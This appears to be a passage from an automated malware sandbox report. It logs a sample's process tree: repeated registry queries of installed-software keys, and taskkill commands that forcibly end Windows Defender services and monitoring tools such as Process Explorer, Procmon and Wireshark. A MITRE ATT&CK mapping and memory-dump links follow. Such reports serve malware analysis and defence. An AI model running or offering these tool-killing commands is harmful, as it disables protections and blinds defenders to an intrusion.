- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:5012
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:5068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:5088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4268
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4596
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4896
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:5072
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:5092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4392
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4348
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4552
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4712
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4220
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4592
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/412-80-0x00007FFDD6390000-0x00007FFDD6D7C000-memory.dmp

Filesize
9.9MB

Download
memory/412-95-0x0000014B71910000-0x0000014B71911000-memory.dmp

Filesize
4KB

Download
memory/412-111-0x0000014B74550000-0x0000014B74551000-memory.dmp

Filesize
4KB

Download